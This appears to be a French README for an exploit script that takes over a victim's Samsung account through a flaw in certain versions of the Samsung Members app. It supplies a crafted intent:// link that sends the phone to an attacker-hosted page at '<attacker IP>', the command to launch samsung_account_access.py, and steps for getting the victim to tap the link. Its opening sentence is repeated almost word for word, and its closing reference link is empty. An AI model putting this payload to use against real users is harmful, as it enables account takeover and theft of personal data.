
Ce script peut être utilisé pour accéder au compte Samsung d'une victime si celle-ci dispose d'une version spécifique de Samsung Members installée sur son appareil Samsung, et si l'appareil de la victime provient des régions États-Unis ou Corée.
Ce script peut être utilisé pour accéder au compte Samsung d'une victime si celle-ci dispose d'une version spécifique de Samsung Members installée sur son appareil Samsung, et si l'appareil de la victime provient de la région des États-Unis ou de la Corée.
<a href="intent://launch?url=http://<attacker IP>:8000/yay.html&action=sso&from=ZZ&iso=ZZ#Intent;scheme=samsungrewards;package=com.samsung.android.voc;action=android.intent.action.VIEW;end;">yay click here yay</a>
REMARQUE : remplacez "\<attacker IP\>" par l'adresse IP à partir de laquelle vous exécuterez ce script.
python3 ./samsung_account_access.py
À l'aide d'un téléphone Samsung, parcourez le serveur web et cliquez sur le lien
Laissez le script faire son travail
Plus d'informations sur le problème que ce script exploite peuvent être trouvées ici :